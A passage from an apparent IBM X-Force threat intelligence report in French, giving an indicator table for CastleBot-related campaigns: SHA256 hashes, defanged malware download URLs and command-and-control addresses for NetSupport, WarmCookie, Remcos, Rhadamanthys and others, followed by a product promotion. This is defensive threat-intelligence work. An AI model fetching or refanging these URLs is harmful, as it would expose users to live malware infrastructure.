/service/download/general_1

URL

URL de téléchargement de NetSupport (13 mai)

2a2cd6377ad69a298af55f2
9359d67e4586ec16e6c02c1
b8ad27c38471145569

SHA256

Charge utile NetSupport ZIP

8b2ebeff16a20cfcf794e8f31
4c37795261619d96d602c8e
e13bc6255e951a43

SHA256

Script PowerShell pour télécharger et extraire une archive ZIP

cbaf513e7fd4322b14adcc34
b34d793d79076ad31092598
1548e8d3cff886527

SHA256

Stager crypté CastleBot

05ecf871c7382b0c74e5bac
267bb5d12446f52368bb1bfe
5d2a4200d0f43c1d8

SHA256

DaveLoader

http://173.44.141[.]89/service/
download/docusign2.exe

URL

URL de téléchargement de WarmCookie (6 juin)

5bca7f1942e07e8c12ecd9c80
2ecdb96570dfaaa1f44a6753e
bb9ffda0604cb4

SHA256

Charge utile WarmCookie

170.130.165[.]112

ipv4

Serveur WarmCookie C2

bf21161c808ae74bf08e8d7f83
334ba926ffa0bab96ccac42dd
e418270387890

SHA256

Chargeur AutoIt pour CastleBot Stager

http://107.158.128[.]105/c9125
2f9ab114f26.php

URL

Serveur StealC C2

e6aab1b6a150ee3cbc721ac25
75c57309f307f69cd1b478d49
4c25cde0baaf85

SHA256

Chargeur contenant le noyau de CastleBot

b45cce4ede6ffb7b6f28f75a0c
bb60e65592840d98dcb63155
b9fa0324a88be2 

SHA256

Noyau de CastleBot

https://google.herionhelpline
[.]com/application/AcerUSBUpdate.
exe

URL

URL de téléchargement de Rhadamanthys (10 juillet)

03122e46a3e48141553e7567
c659642b1938b2d3641432f9
16375c163df819c1 

SHA256

Charge utile de première étape de Rhadamanthys

https://google.herionhelpline
[.]com/app/light1_v5_signed.
html

URL

URL de téléchargement de Remcos (10 juillet)

12de997634859d1f93273e55
2dec855bfae440dcf11159ada19
ca0ae13d53dff 

SHA256

Charge utile de Remcos

https://google.herionhelpline[.]com
/app/SlackUpdateWeb.html

 

URL

URL de téléchargement de DeerStealer (10 juillet)

c8f95f436c1f618a8ef5c49055
5c6a1380d018f44e1644837f19
cb71f6584a8a 

SHA256

Charge utile de DeerStealer

8bf93cef46fda2bdb9d2a426
fbcd35ffedea9ed9bd97bf78c
c51282bd1fb2095

SHA256

Stager crypté CastleBot

http://107.158.128[.]45/service
/download/Exchanger32.zip

URL

URL de téléchargement de HijackLoader et SecTopRAT (5 juillet)

4834bc71fc5d3729ad5280e4
4a13e9627e3a82fd4db1bb992
fa8ae52602825c6

SHA256

Charge utile ZIP HijackLoader et SecTopRAT

53dddae886017fbfbb43ef2369
96b9a4d9fb670833dfa0c3eac
982815dc8d2a5

SHA256

Stager crypté CastleBot

http://107.158.128[.]45/service
/download/CCver_Setup.exe

URL

URL de téléchargement de MonsterV2 (10 juillet)

ab725f5ab19eec691b66c37c715
abd0e9ab44556708094a911b8
4987d700aa62

SHA256

Charge utile MonsterV2

IBM X-Force Premier Threat Intelligence est désormais intégré à OpenCTI by Filigran, fournissant des renseignements opérationnels exploitables sur cette activité malveillante et bien plus encore. Accédez à des informations sur les acteurs de la menace, les logiciels malveillants et les risques sectoriels. Installez le OpenCTI Connector pour améliorer la détection et la réponse, en renforçant votre cybersécurité grâce à l’expertise d’IBM X-Force. Obtenez une version d’essai de 30 jours de X-Force Premier Threat Intelligence dès aujourd’hui !
